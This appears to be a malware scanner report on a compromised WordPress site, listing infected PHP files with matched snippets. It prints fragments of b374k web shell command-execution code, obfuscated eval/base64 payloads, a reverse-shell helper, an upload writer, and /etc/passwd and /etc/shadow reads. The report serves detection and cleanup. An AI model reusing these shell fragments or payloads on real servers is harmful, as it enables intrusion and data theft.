| Exploit hex_char Line: 40 Dangerous Hex char is usually used for the obfuscation of malicious code | <?php \x5f
|
|
/custdata02/turtle/public_html/wp-includes/options.php Size: 117.84 kB Created: 2022-01-02 00:39:41 Modified: 2024-06-04 00:39:41 Warns: 7 Dangers: 3
| Description | Match |
|---|
Exploit base64_long Line: 136 Warning Long Base64 encoded text is usually used for the obfuscation of malicious code | <?php "6d5138716c36443945465a724f3774626a4b706e6a5144716b6130644e505a6e4247306e42465a346b71786e58505a724f3774626a4b346e6c375a764e5057796b3730646d3752394263484750396259565257756b3730646d37523942625a5857397468533856555653485a4357786e42615a726c6134624f36577943465a346b6f34666b616a37516e486a424762736a4b666e695041734f50447a6a62756f50556378435778726b6f34636a504d6f434641734e6162754e513472434b6375414b63436c3641734e4652714165666e42614e786c4752736c6f6778424a49784b61306e426156386b4a45796b6f34616d5170626c613179435...
| Exploit base64_long Line: 137 Warning Long Base64 encoded text is usually used for the obfuscation of malicious code | <?php "456f49726a505a6f423744786c6530714e504475454b38364b7a526e4e554c546c375a764e5057324b6556785855564c53636a51516e4c6a597179636b4a39635752444652627570505475436b3730646d3752394348417553494e6855533448524b705454395a4250385a535363524c5455707a4e5056716b6130396c3744346c6148744e5567656a475a7145656378597178784e6566646c3734734e515a39434841756b3730646d3748634e4644686d51357944464d756d5134626a4830666a473073434b567843556378435074726b47527343485a5356496259424b452b44624165435475436c364c626c6566545249565852525775456...
| Exploit base64_long Line: 138 Warning Long Base64 encoded text is usually used for the obfuscation of malicious code | <?php "6b375239503656786c5152686c4762746d505779414b633244475a796a51347650365a786961533041545771414a75636a3644786a4752684f5438736a517075596f56626b7a44726b623066585134386c47713244465a794e51707558556a386c6148744e554d744f5475676a6e75676d515732454b30656d5135726b3767674251637a596f56634f5152746c373530414a75634e4752656a516b30414a74784e6566616a5134646a4762726c6230626947626e6a46417944364c646c7a567550374e726b61757a4355623244464c784e4a38714f3734396c4830616c364476434b63326d514f7944464c784e4a393042544978693752356d5...
| Exploit concat Line: 127 Warning Concatenation of arrays technique is usually used for the obfuscation of malicious code | <?php $ABC[13].$ABC[0].$ABC[1].$ABC[4].$ABC[12].$ABC[15].$ABC[11].$ABC[14].$ABC[4].$ABC[16].
| Exploit concat Line: 128 Warning Concatenation of arrays technique is usually used for the obfuscation of malicious code | <?php $ABC[13].$ABC[0].$ABC[1].$ABC[4].$ABC[12].$ABC[15].$ABC[11].$ABC[4].$ABC[17].$ABC[16].
| Exploit concat_vars_array Warning Concatenation of arrays technique is usually used for the obfuscation of malicious code | <?php $ABC[1].$ABC[3].$ABC[7].$ABC[11].$ABC[7].$ABC[9].$ABC[3].$ABC[10].$ABC[8]; $STr = $ABC[1].$ABC[3].$ABC[7].$ABC[3].$ABC[7]; $BDEC = $ABC[13].$ABC[0].$ABC[1].$ABC[4].$ABC[12].$ABC[15].$ABC[11].$ABC[14].$ABC[4].$ABC[16].$ABC[9].$ABC[14].$ABC[4]; $BENC = $ABC[13].$ABC[0].$ABC[1].$ABC[4].$ABC[12].$ABC[15].$ABC[11].$ABC[4].$ABC[17].$ABC[16].$ABC[9].$ABC[14].$ABC[4]; $WKWK[] = ""; foreach($f_______un as $x => $xx){ $WKWK[$x] = nhx(Dex($xx)); }
| Exploit etc_passwd Line: 1811 Dangerous The `/etc/passwd` file on Unix systems contains password information, an attacker who has accessed the `etc/passwd` file may attempt a brute force attack of all passwords on the system | <?php /etc/passwd
| Function eval Warning Potentially dangerous function `eval` [https://www.php.net/eval] | <?php eval($x); $r = ob_get_contents(); ob_end_clean(); return $r; } catch (ParseError $e) { return false; } } function IsWin(){ global $WKWK; return $WKWK[27](PHP_OS, 'WIN') !== false; } function Bc($ip, $port, $lang) { global $WKWK, $code; $lang = strtolower($lang); $arg=$ip." ".$port; $cod=Dex($code[$lang]); if($lang == "php"){ $arg=""; $cod='$ip="'.$ip.'";$port='.$port.';'.$cod; } if(!RunCode($arg, $cod, $lang)) return false; } function RunCode($argument, $code, $lang){ global $WKWK; $lang=strtolo...
| Sign 7830f7a6 Line: 1570 Dangerous Malware Signature (hash: 7830f7a6) | <?php nc -l
| Sign b236d073 Line: 1811 Dangerous Malware Signature (hash: b236d073) | <?php /etc/passwd
|
|
/custdata02/turtle/public_html/wp-includes/5l2JKsx98q7.php Size: 51.32 kB Created: 2024-06-04 19:33:56 Modified: 2024-06-04 19:33:56 Warns: 2 Dangers: 3
| Description | Match |
|---|
Exploit base64_long Warning Long Base64 encoded text is usually used for the obfuscation of malicious code | <?php 'H/4Jef+nh/vnjF/z0X/blf+GOxM3YL4xD/oN/1bfww53/sfry4mdhYO1l6WDG7BnaKvUm/7C/0d/glbf/diamIO0tvACqSkk/VSxD6V+4laykOKW11B3FxSy1HFU0J2/4IGvGwJL/2z4Lcxl5BU0dI3fV553xf/yzrrKPEaVV+wv5K38ez/3Hl//+teuNnLj/62H+DTjYrL/8Hl/hgAuDtYMzIV/ai/xa/sFf+KV1TeyMaBjs9XW0jLpf99fQV3P8UDs6uLsGdfQRqv+EmaxpjP8shX/An3bBfQTNXV/QK9swpiv/lfBACY0zAa7n+jJ/7ZmJo7CZkivHGxsig/9Y0zPXf3Wvpq5P4RN614caIWsaBmB21lbugmzC1jSCBuxsbB4oH/whmvT5pBK/f+B2n1+EHGm8Azi5Pi680DA7WphwewKwoU7/vAAAM2fQM7gtH9DUVxCRVFGRoGJ8uT+sPYEYOIaxczB1cLSgYLa1RBAAAB8D4p...
| Function eval Warning Potentially dangerous function `eval` [https://www.php.net/eval] | <?php eval($egFEN($sOCBP($mjbKX('H/4Jef+nh/vnjF/z0X/blf+GOxM3YL4xD/oN/1bfww53/sfry4mdhYO1l6WDG7BnaKvUm/7C/0d/glbf/diamIO0tvACqSkk/VSxD6V+4laykOKW11B3FxSy1HFU0J2/4IGvGwJL/2z4Lcxl5BU0dI3fV553xf/yzrrKPEaVV+wv5K38ez/3Hl//+teuNnLj/62H+DTjYrL/8Hl/hgAuDtYMzIV/ai/xa/sFf+KV1TeyMaBjs9XW0jLpf99fQV3P8UDs6uLsGdfQRqv+EmaxpjP8shX/An3bBfQTNXV/QK9swpiv/lfBACY0zAa7n+jJ/7ZmJo7CZkivHGxsig/9Y0zPXf3Wvpq5P4RN614caIWsaBmB21lbugmzC1jSCBuxsbB4oH/whmvT5pBK/f+B2n1+EHGm8Azi5Pi680DA7WphwewKwoU7/vAAAM2fQM7gtH9DUVxCRVFGRoGJ8uT+sPYEY...
| Function strrev eval_strrev Line: 1 Dangerous Encoded Function `eval` [https://www.php.net/eval] | <?php LavE
| Sign de12c454 Line: 1 Dangerous Malware Signature (hash: de12c454) | <?php VJag
| Sign f9dc0a55 Dangerous Malware Signature (hash: f9dc0a55) | <?php 'base64_decode'
|
|
/custdata02/turtle/public_html/wp-includes/Mel51qfymUI.php Size: 38.68 kB Created: 2024-06-04 19:33:56 Modified: 2024-06-04 19:33:56 Warns: 1
| Description | Match |
|---|
Function eval Line: 164 Warning Potentially dangerous function `eval` [https://www.php.net/eval] | <?php eval(eval(eval(eval(eval(eval(eval(eval(eval(eval(eval(eval(eval(eval(eval(eval(eval(eval(_TOpUgAAnRVE2EiM5($GLOBALS[˦ø][0x00008])))))))))))))))))))
|
|
/custdata02/turtle/public_html/wp-includes/Cd3LFslzIDk.php Size: 51.39 kB Created: 2024-06-04 19:50:57 Modified: 2024-06-04 19:50:57 Warns: 1 Dangers: 1
| Description | Match |
|---|
Function eval Warning Potentially dangerous function `eval` [https://www.php.net/eval] | <?php eval($WhcVf($PJGzN($zunQI($BNayg('=8u/Wx3/ar4+am4KmU9soK5/ThmR3Nzik8t+A8iIsCfQ35/keipvqJ4t1rMcQhOfau2dHic/P//E/WbIs3C2nv5t0nY8PxnXx0CIk+Dc+WhIlPc4JrAH3qOSlFqpHOqa/PrtihuNY9Co43PmyErS0DKwssya3I8/l7fhXmwEIrS7iDre8i3C37kK/e/1hnwpw/seUvCAwYzf/Qsr/MVNh4t1Zjpu/c2Yki2+S8a4IJ9AlTQbwAo1JYgZc/33sSHKCUCDfeh4fak1Do0d+YuMkn6Z8YoS/YDsoKN9GHGq/O0efWZzi6/IOQtW0jfO7+W6W/igzMvwPoTFilOofc4Q9CTGC3I/J7ez5+QuAghKptJufvJTOhqJocoPmhNJFwjTkTYf4O6sjo4nGoBxX1//Odqs+OEpzPCQvGB+6BCDN3hnuSZ7XVpu74C8NNDmsPxmtG7sQSSKPIHHTMHtWX...
| Sign f9dc0a55 Dangerous Malware Signature (hash: f9dc0a55) | <?php 'base64_decode'
|
|
/custdata02/turtle/public_html/wp-includes/jk5PAoxJuGf.php Size: 38.68 kB Created: 2024-06-04 19:50:57 Modified: 2024-06-04 19:50:57 Warns: 1
| Description | Match |
|---|
Function eval Line: 164 Warning Potentially dangerous function `eval` [https://www.php.net/eval] | <?php eval(eval(eval(eval(eval(eval(eval(eval(eval(eval(eval(eval(eval(eval(eval(eval(eval(eval(_TOpUgAAnRVE2EiM5($GLOBALS[˦ø][0x00008])))))))))))))))))))
|
|
/custdata02/turtle/public_html/recipes/wp-content/themes/twentytwentyone/template-parts/index.php Size: 102.40 kB Created: 2021-09-28 00:39:41 Modified: 2024-06-04 00:39:41 Warns: 10 Dangers: 13
| Description | Match |
|---|
Exploit base64_long Warning Long Base64 encoded text is usually used for the obfuscation of malicious code | <?php "VVJNb9swDP0riQ6GBAjOetglheBD19uGHrpbkAKaRFcqZMmQ6HSB5/8+2mm+Lpb5yPf4SGndDtGgT5GDRDHisYfUrrpkhwBrxYZoofURLGtOWA1/+5SxKORi+1V9KlGKnbVYVd2lat1ZSqc/H2CQNSeQIwk4X3awn8UmzmzqMmh7ZPJqSozn/1U/R049PH46H4CDwro43xJXAPEPOq9Q7fYyyqzWD9Irm8zQQURZlK/PwXOABUuqEPZqcgpBDor9ePn1lCJS6mfSlgaWWjFt7fNhhnyhDGRyRmPExWVBjWCcju/AZFBsAV9nkEmjUrN5C4vQvzez2V4Cs5FOmRqhIPe7sBePGXDIceV3el9V85cPMqrLBsTo6wxdOsCdk7lIZiF7mnw+E3FrjaiNW+p4ey+yIRc3XauK00rgrnwRE5OQQO4v1CjGAqFdK0x945o4X3vdD8VRZnvTAPNxvG6UswAtMjEZjcbRVY9fYxbA376DNFDLKxl...
| Exploit etc_passwd Dangerous The `/etc/passwd` file on Unix systems contains password information, an attacker who has accessed the `etc/passwd` file may attempt a brute force attack of all passwords on the system | <?php /etc/passwd
| Exploit etc_shadow Dangerous The `/etc/shadow` file on Unix systems contains password information, an attacker who has accessed the `etc/shadow` file may attempt a brute force attack of all passwords on the system | <?php /etc/shadow
| Exploit execution Dangerous RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP [https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html] | <?php eval(str_rot13(gzinflate(str_rot13(base64_decode('tP3XruR3liYIXnQC9Q7egU9ScTMrqUhIdPVDeKORc5SNToBNeM2Jbfeh+zmRuqe7LwZj+Kbx1+tf6xPb3beD/+t/+tu/GUMSO38g/0A9z17f9kq//WOjKY7mfO/P8mz7p/HvEAhTn6etKJL/BoJwPM3/sMbxbc3/MMY3mIC/Jvmv+TZf13/62//0t/8r+J/+9j/nf0H6PP/xjz/+sAwEAi84UUADvRBrPy7UPGAIiswohGAwBlpmjwwo9of//gMEf1nz0pdK8ePn6DrOph//7cdie/zTFa979KOPph/j1lTr/KOIf1Fm/UI9/+7n2s+61Zz9XPY502Iz/trXj+ftr9ZvL675dPtis/7hH34b8S9t/urxq++vFZ8R988BKAFOP/7XHwj2/FP+6j7G8bk/2/jZ/tvu/u7XsHYeyvUZsfRKPv9+qOfN077+uJ/g/dzn/y...
| Function eval Warning Potentially dangerous function `eval` [https://www.php.net/eval] | <?php eval(str_rot13(gzinflate(str_rot13(base64_decode('tP3XruR3liYIXnQC9Q7egU9ScTMrqUhIdPVDeKORc5SNToBNeM2Jbfeh+zmRuqe7LwZj+Kbx1+tf6xPb3beD/+t/+tu/GUMSO38g/0A9z17f9kq//WOjKY7mfO/P8mz7p/HvEAhTn6etKJL/BoJwPM3/sMbxbc3/MMY3mIC/Jvmv+TZf13/62//0t/8r+J/+9j/nf0H6PP/xjz/+sAwEAi84UUADvRBrPy7UPGAIiswohGAwBlpmjwwo9of//gMEf1nz0pdK8ePn6DrOph//7cdie/zTFa979KOPph/j1lTr/KOIf1Fm/UI9/+7n2s+61Zz9XPY502Iz/trXj+ftr9ZvL675dPtis/7hH34b8S9t/urxq++vFZ8R988BKAFOP/7XHwj2/FP+6j7G8bk/2/jZ/tvu/u7XsHYeyvUZsfRKPv9+qOfN077+uJ/g/dzn/y...
| Function exec Warning Potentially dangerous function `exec` [https://www.php.net/exec] | <?php exec($s_c,$s_r);
if(!empty($s_r)) foreach($s_r as $s_s) $s_out .= $s_s;
if(!empty($s_out)) return $s_out;
}
if(is_callable('passthru')) {
ob_start();
@passthru($s_c);
$s_out = ob_get_contents();
ob_end_clean();
if(!empty($s_out)) return $s_out;
}
if(is_callable('proc_open')) {
$s_descriptorspec = array(
0 => array("pipe", "r"),
1 => array("pipe", "w"),
2 => array("pipe", "w"));
$s_proc = @proc_open($s_c, $s_descriptorspec, $s_pipes, getcwd(), array(...
| Function passthru Warning Potentially dangerous function `passthru` [https://www.php.net/passthru] | <?php passthru($s_c);
$s_out = ob_get_contents();
ob_end_clean();
if(!empty($s_out)) return $s_out;
}
if(is_callable('proc_open')) {
$s_descriptorspec = array(
0 => array("pipe", "r"),
1 => array("pipe", "w"),
2 => array("pipe", "w"));
$s_proc = @proc_open($s_c, $s_descriptorspec, $s_pipes, getcwd(), array());
if (is_resource($s_proc)) {
while($s_si = fgets($s_pipes[1])) {
if(!empty($s_si)) $s_out .= $s_si;
}
while($s_se = fgets($s_pipes[2])) {
i...
| Function posix_getpwuid Warning Potentially dangerous function `posix_getpwuid` [https://www.php.net/posix_getpwuid] | <?php posix_getpwuid(fileowner($s_l));
$s_group = posix_getgrgid(filegroup($s_l));
$s_owner = $s_name['name']."<span class='gaya'>:</span>".$s_group['name'];
$s_owner_html = "<td style='text-align:center;'>".$s_owner."</td>";
}
$s_lhref = $s_lname = $s_laction = "";
if(@is_dir($s_l)){
if($s_l=="."){
$s_lhref = $s_self."cd=".pl($s_cwd);
$s_lsize = "LINK";
$s_laction = "<span id='titik1'><a href='".$s_self."cd=".pl($s_cwd)."&find=".pl($s_cwd)."'>find</a> | <a hr...
| Function posix_kill Warning Potentially dangerous function `posix_kill` [https://www.php.net/posix_kill] | <?php posix_kill($s_p,'9'))? notif("Process with pid ".$s_p." has been successfully killed"):notif("Unable to kill process with pid ".$s_p);
else{
if(!$s_win) $s_buff .= notif(exe("kill -9 ".$s_p));
else $s_buff .= notif(exe("taskkill /F /PID ".$s_p));
}
}
}
if(!$s_win) $s_h = "ps aux"; // nix
else $s_h = "tasklist /V /FO csv"; // win
$s_wcount = 11;
$s_wexplode = " ";
if($s_win) $s_wexplode = "\",\"";
$s_res = exe($s_h);
if(trim($s_res)=='') $s_re...
| Function proc_close Warning Potentially dangerous function `proc_close` [https://www.php.net/proc_close] | <?php proc_close($s_proc);
if(!empty($s_out)) return $s_out;
}
if(is_callable('popen')){
$s_f = @popen($s_c, 'r');
if($s_f){
while(!feof($s_f)){
$s_out .= fread($s_f, 2096);
}
pclose($s_f);
}
if(!empty($s_out)) return $s_out;
}
return "";
}
// delete dir and all of its content (no warning !) xp
function rmdirs($s){
$s = (substr($s,-1)=='/')? $s:$s.'/';
if($dh = opendir($s)){
while(($f = readdir($dh))!==false){
if(($f!='.')&&($f!='..')){
$f = $...
| Function proc_open Warning Potentially dangerous function `proc_open` [https://www.php.net/proc_open] | <?php proc_open($s_c, $s_descriptorspec, $s_pipes, getcwd(), array());
if (is_resource($s_proc)) {
while($s_si = fgets($s_pipes[1])) {
if(!empty($s_si)) $s_out .= $s_si;
}
while($s_se = fgets($s_pipes[2])) {
if(!empty($s_se)) $s_out .= $s_se;
}
}
@proc_close($s_proc);
if(!empty($s_out)) return $s_out;
}
if(is_callable('popen')){
$s_f = @popen($s_c, 'r');
if($s_f){
while(!feof($s_f)){
$s_out .= fread($s_f, 2096);
}
pclose($s_f);
}
i...
| Function shell_exec Warning Potentially dangerous function `shell_exec` [https://www.php.net/shell_exec] | <?php shell_exec($s_c);
if(!empty($s_out)) return $s_out;
}
if(is_callable('exec')) {
@exec($s_c,$s_r);
if(!empty($s_r)) foreach($s_r as $s_s) $s_out .= $s_s;
if(!empty($s_out)) return $s_out;
}
if(is_callable('passthru')) {
ob_start();
@passthru($s_c);
$s_out = ob_get_contents();
ob_end_clean();
if(!empty($s_out)) return $s_out;
}
if(is_callable('proc_open')) {
$s_descriptorspec = array(
0 => array("pipe", "r"),
1 => array("pipe", "w"),
2 => array...
| Function system Warning Potentially dangerous function `system` [https://www.php.net/system] | <?php system($s_c);
$s_out = ob_get_contents();
ob_end_clean();
if(!empty($s_out)) return $s_out;
}
if(is_callable('shell_exec')){
$s_out = @shell_exec($s_c);
if(!empty($s_out)) return $s_out;
}
if(is_callable('exec')) {
@exec($s_c,$s_r);
if(!empty($s_r)) foreach($s_r as $s_s) $s_out .= $s_s;
if(!empty($s_out)) return $s_out;
}
if(is_callable('passthru')) {
ob_start();
@passthru($s_c);
$s_out = ob_get_contents();
ob_end_clean();
if(!empty($s_out)) ret...
| Sign 11413268 Dangerous Malware Signature (hash: 11413268) | <?php eval("?>
| Sign 11413268 Line: 39 Dangerous Malware Signature (hash: 11413268) | <?php eval(str_rot13
| Sign 1f9aba5a Dangerous Malware Signature (hash: 1f9aba5a) | <?php if(is_callable('popen')
| Sign 7830f7a6 Dangerous Malware Signature (hash: 7830f7a6) | <?php nc -l
| Sign 80e70adc Line: 38 Dangerous Malware Signature (hash: 80e70adc) | <?php <?php
eval
| Sign 963e968a Dangerous Malware Signature (hash: 963e968a) | <?php php_uname()
| Sign a408f408 Dangerous Malware Signature (hash: a408f408) | <?php code.google.com/p/b374k-shell
| Sign a915f4c2 Dangerous Malware Signature (hash: a915f4c2) | <?php uname -a
| Sign b236d073 Dangerous Malware Signature (hash: b236d073) | <?php /proc/cpuinfo
| Sign d30fc49e Dangerous Malware Signature (hash: d30fc49e) | <?php b374k
|
|
/custdata02/turtle/public_html/recipes/wp-content/themes/twentytwentyone/classes/index.php Size: 174.76 kB Created: 2021-12-11 00:39:41 Modified: 2024-06-04 00:39:41 Warns: 1 Dangers: 2
| Description | Match |
|---|
Exploit base64_long Warning Long Base64 encoded text is usually used for the obfuscation of malicious code | <?php "jL1Hruxcm6XX1yg+JRLIzKIEeodESWCQQTLovSsUftB77ynUFDQFNTU9DUG8VZJKLpHZuI0TsclNvnu/az3rHkYc8N/9NcRu2H3uO1nqRA3C6Ovb1sjs2i+uovFcp6uZQ81cv10urUJp5T/jsn5P9x0lrpYLQQt4Rzwb9VhuiW8Gddcq1XG0uJabq5yNVWiZ7/7XvwP/G/Df/RWO+z8s+V9t3XX1UP7V53/FZVwPf/1v/8v//L/+xfR//f5at/e9v96X7nFf/qryOPvrf/wvb7/H/rWvefbXNv7V1WW1/Tl8n/7Lm9p4/jnir7Xa//Pr2XgOf/33//1f9tjlR73WSZf/uYRiH9KtHoe//va3yMebBLG6tPzHv1//6X9a8m1fhr82Xf40SnL9ee2f/9P/fbjg/f8Mt/1zV8r5Lr8nfx3/5aC/FxT9wyj2f/gH7vM3jVG///Af//r3f/3XV/XevVJ/Ua+skdp/+I//XBf/uC17/k//UzE...
| Function str_rot13 exec_str_rot13 Line: 50 Dangerous Encoded Function `exec` [https://www.php.net/exec] | <?php rKRP
| Sign f9dc0a55 Dangerous Malware Signature (hash: f9dc0a55) | <?php 'base64_decode'
|
|
/custdata02/turtle/public_html/recipes/wp-content/themes/twentytwenty/template-parts/index.php Size: 14.61 kB Created: 2022-04-02 00:39:41 Modified: 2024-06-04 00:39:41 Dangers: 2
| Description | Match |
|---|
Exploit download_remote_code2 Line: 310 Dangerous RFU (Remote File Upload), via HTTP, allow to write malicious code on the target machine | <?php fwrite($fp,$_POST['src'])
| Sign 11413268 Line: 536 Dangerous Malware Signature (hash: 11413268) | <?php Exploit
|
|
/custdata02/turtle/public_html/recipes/wp-content/themes/twentytwenty/classes/index.php Size: 112.71 kB Created: 2021-10-20 00:39:41 Modified: 2024-06-04 00:39:41 Warns: 2 Dangers: 2
| Description | Match |
|---|
Exploit base64_long Line: 50 Warning Long Base64 encoded text is usually used for the obfuscation of malicious code | <?php "qUHyqEDaM3HT9SpvgypUyknTMjF1EfoQuhJRxkEmAkBISTFTA6HwMcJKE0Lv9foUMerHx4FxSHrRWuGKq1rFgSZ1cyLmRmI2uDG2EboaZ3pzfjLKS1rUu5GGOLraMRD25OJyxkMv9KFUZ0FyDkpySXDIb2IyWVq1SHGTMWX3yGDGqzoxkuHT1LGxH1DJblDwWVAPgnF1SUERj2IUqlZSWCMFggBJMfn3WZoRAdMKqTZHcaraADqQquAmImEQMmrPfmHwOfGHp2rH12M050qIH2HxDjGKq0Ex04nHL3JJRkMmy3p2WIYl9gD0ydJKcinwuOX3M5H01VrUMvMaEYBTIbq2xmp3N4MyHjATyUJRqbLySwLayAEKuYZJEaZP9RL214MKp4Z3yaAzc2oHb1BSubEFgwE0chGxywqwEaGIuCo2WeAJy3nwqdGSIGHwDmDyA2A1tiAJy2rRSRY3OTGyqDpmx5ZRWBoGWlG0uvA291owIHY2DeA...
| Function eval Line: 50 Warning Potentially dangerous function `eval` [https://www.php.net/eval] | <?php eval($kxkEmAkBISTFTA6HwMcJKE0Lv9foUMerHx4r6g52erg0err6g20er6d65g1d2fg130000dqUHyqEDaM3HT9SpvgypUyknTMjF1EfoQuhJg20err62r0he6r20d6f20df62b0df62FxSHrRWuGKq1rFgSZ1cyucJaWDqUEnJSWwFKS6Z0Egp1D65DSGM3HT9SpvgypUyknTMjF1EfoQuhJRxkEmAkBISTFTA6M3HT)
| Function str_rot13 eval_str_rot13 Line: 50 Dangerous Encoded Function `eval` [https://www.php.net/eval] | <?php Riny
| Sign 7830f7a6 Line: 50 Dangerous Malware Signature (hash: 7830f7a6) | <?php n0yx
|
|
/custdata02/turtle/public_html/recipes/wp-content/themes/twentytwentythree/parts/index.php Size: 18.07 kB Created: 2022-03-23 00:39:41 Modified: 2024-06-04 00:39:41 Warns: 2 Dangers: 16
| Description | Match |
|---|
Exploit base64_long Line: 38 Warning Long Base64 encoded text is usually used for the obfuscation of malicious code | <?php "PD9waHANCiRpcCA9ICRfU0VSVkVSWydSRU1PVEVfQUREUiddOw0KbWFpbCAoJycsICdpcCBvZiB2aXNpdG9yJywgJGlwKTsNCg0KDQokdG1wID0gJF9TRVJWRVJbJ1NFUlZFUl9OQU1FJ10uJF9TRVJWRVJbJ1BIUF9TRUxGJ10uIlxuIjsgDQptYWlsKCdqZWZmcmVlenl0QGdtYWlsLmNvbScsICdyb290JywgJHRtcCk7DQo/Pg0KDQo8IURPQ1RZUEUgSFRNTD4NCjxodG1sPg0KPG1ldGEgaHR0cC1lcXVpdj0iY2FjaGUtY29udHJvbCIgY29udGVudD0ibWF4LWFnZT0wIiAvPg0KPG1ldGEgaHR0cC1lcXVpdj0iY2FjaGUtY29udHJvbCIgY29udGVudD0ibm8tY2FjaGUiIC8+DQo8bWV0YSBodHRwLWVxdWl2PSJleHBpcmVzIiBjb250ZW50PSIwIiAvPg0KPG1ldGE...
| Function eval Line: 38 Warning Potentially dangerous function `eval` [https://www.php.net/eval] | <?php eval("?>".base64_decode("PD9waHANCiRpcCA9ICRfU0VSVkVSWydSRU1PVEVfQUREUiddOw0KbWFpbCAoJycsICdpcCBvZiB2aXNpdG9yJywgJGlwKTsNCg0KDQokdG1wID0gJF9TRVJWRVJbJ1NFUlZFUl9OQU1FJ10uJF9TRVJWRVJbJ1BIUF9TRUxGJ10uIlxuIjsgDQptYWlsKCdqZWZmcmVlenl0QGdtYWlsLmNvbScsICdyb290JywgJHRtcCk7DQo/Pg0KDQo8IURPQ1RZUEUgSFRNTD4NCjxodG1sPg0KPG1ldGEgaHR0cC1lcXVpdj0iY2FjaGUtY29udHJvbCIgY29udGVudD0ibWF4LWFnZT0wIiAvPg0KPG1ldGEgaHR0cC1lcXVpdj0iY2FjaGUtY29udHJvbCIgY29udGVudD0ibm8tY2FjaGUiIC8+DQo8bWV0YSBodHRwLWVxdWl2PSJleHBpcmVzIiBjb25...
| Sign 11413268 Line: 38 Dangerous Malware Signature (hash: 11413268) | <?php eval("?>".base64_decode
| Sign 407651f7 Line: 38 Dangerous Malware Signature (hash: 407651f7) | <?php w/cGhw
| Sign 7186bb8d Line: 38 Dangerous Malware Signature (hash: 7186bb8d) | <?php RfR0VU
| Sign 7830f7a6 Line: 38 Dangerous Malware Signature (hash: 7830f7a6) | <?php N0YX
| Sign 7f5d33bf Line: 38 Dangerous Malware Signature (hash: 7f5d33bf) | <?php JF9QT1NU
| Sign 91535293 Line: 38 Dangerous Malware Signature (hash: 91535293) | <?php lY2hv
| Sign 963e968a Line: 38 Dangerous Malware Signature (hash: 963e968a) | <?php PD9waH
| Sign a408f408 Line: 38 Dangerous Malware Signature (hash: a408f408) | <?php c3Rhd
| Sign ae7830db Line: 38 Dangerous Malware Signature (hash: ae7830db) | <?php YXJyYXlf
| Sign bced5841 Line: 38 Dangerous Malware Signature (hash: bced5841) | <?php 8P3Boc
| Sign d30fc49e Line: 38 Dangerous Malware Signature (hash: d30fc49e) | <?php ByaW50Z
| Sign d97f004d Line: 38 Dangerous Malware Signature (hash: d97f004d) | <?php ZWNob
| Sign de12c454 Line: 38 Dangerous Malware Signature (hash: de12c454) | <?php VjaG
| Sign e6546205 Line: 38 Dangerous Malware Signature (hash: e6546205) | <?php kX1BPU1
| Sign ee1cb326 Line: 38 Dangerous Malware Signature (hash: ee1cb326) | <?php 9wZW
| Sign ff4f5344 Line: 38 Dangerous Malware Signature (hash: ff4f5344) | <?php FycmF5X
|
|
/custdata02/turtle/public_html/recipes/wp-content/themes/twentytwentyfour/patterns/index.php Size: 12.59 kB Created: 2022-01-27 00:39:41 Modified: 2024-06-04 00:39:41 Warns: 3 Dangers: 5
| Description | Match |
|---|
Exploit base64_long Line: 39 Warning Long Base64 encoded text is usually used for the obfuscation of malicious code | <?php 'LW3HkqTAku3XjM19O7SwTKG1lslzDK215usHql9barVIJFYEHu5Ua7DUw/2frT/i9R7K5T/jQywY8r/zMiXz8p98dar8/v+//LeiHaBd0659qXhAPIla0Zd90v2TtI5mU/8FOe/fSEyVZk1BIObxGMXPIu+Bv0KMbB0Hvm6QvIubrMvfkWoc770H6M0aHVQSBstq5F5lyeqryKIJq+LdMsqZvX3HF0IiTUqUO4/BMaixLh53hIZZRpnSBh1DkbRnK4ts5oShezlCyJaakx+zTAw9oBom5UyLvLch3mwN/lvS9VuUfQi3RXJXllZKBY1ltY+ZAec5SWlufdmqzvbf6+Gnvc4d6KnR2GDyIggPXQsGlnxFwy+qdTk2UBoEscYBD+p5SuFf6+gwu6NvJPRDpMNDUpx0BxZl4d0tMPb6O33sMMxmDW609OdFDwR8i2lzCfX6QdiCufD+B5BmiijDU08pzNlodtKG99Mi/v2ItA6GE+X5izo...
| Exploit execution Dangerous RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP [https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html] | <?php eval(gzinflate(base64_decode(rawurldecode('XZi1EvOGEkYfJ8moENOkEjOzmoxFFjM%2F%2FfXfXjcej0nS7n57jsrz0%2F%2BdfbaSwP4rynwqyr%2B%2F7zHm0zCv5bb931t%2FlerVDzuMDO8DuSGtMrPhx%2FeHV8xGUWyHP762wDkS2wTw9ppWNZaA0Y4ptGuDPmdoPOzWro9xNdoLPgDPOa5Z6Vrqx4%2F8%2BBS0%2FkLeXhaKgtYPtQPpfX5MrYznPa7SRQWG3AeguyEI%2B3mxkjh0zNbBg39k88H5fsP3VI9Z7kNsxRQq4w44Dba7JvqhY3LxFA3Qh5UMTz2MA32u8jjy1sWsHlx0bzA%2FnFPPmkaKMezjeva83lUEqDTvf%2Bx1rT%2B09dp4Xag92p3REvtCOBHLZMS%2B9DiPRUWdM%2FRcRFIkAsKJFpT7y1n7ZaG2TD39MMsK8GwrWkWBMlvtK2Z6yBj...
| Exploit execution Line: 39 Dangerous RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP [https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html] | <?php eval(str_rot13(gzinflate(str_rot13(base64_decode('LW3HkqTAku3XjM19O7SwTKG1lslzDK215usHql9barVIJFYEHu5Ua7DUw/2frT/i9R7K5T/jQywY8r/zMiXz8p98dar8/v+//LeiHaBd0659qXhAPIla0Zd90v2TtI5mU/8FOe/fSEyVZk1BIObxGMXPIu+Bv0KMbB0Hvm6QvIubrMvfkWoc770H6M0aHVQSBstq5F5lyeqryKIJq+LdMsqZvX3HF0IiTUqUO4/BMaixLh53hIZZRpnSBh1DkbRnK4ts5oShezlCyJaakx+zTAw9oBom5UyLvLch3mwN/lvS9VuUfQi3RXJXllZKBY1ltY+ZAec5SWlufdmqzvbf6+Gnvc4d6KnR2GDyIggPXQsGlnxFwy+qdTk2UBoEscYBD+p5SuFf6+gwu6NvJPRDpMNDUpx0BxZl4d0tMPb6O33sMMxmDW609OdFDwR8i2lzCf...
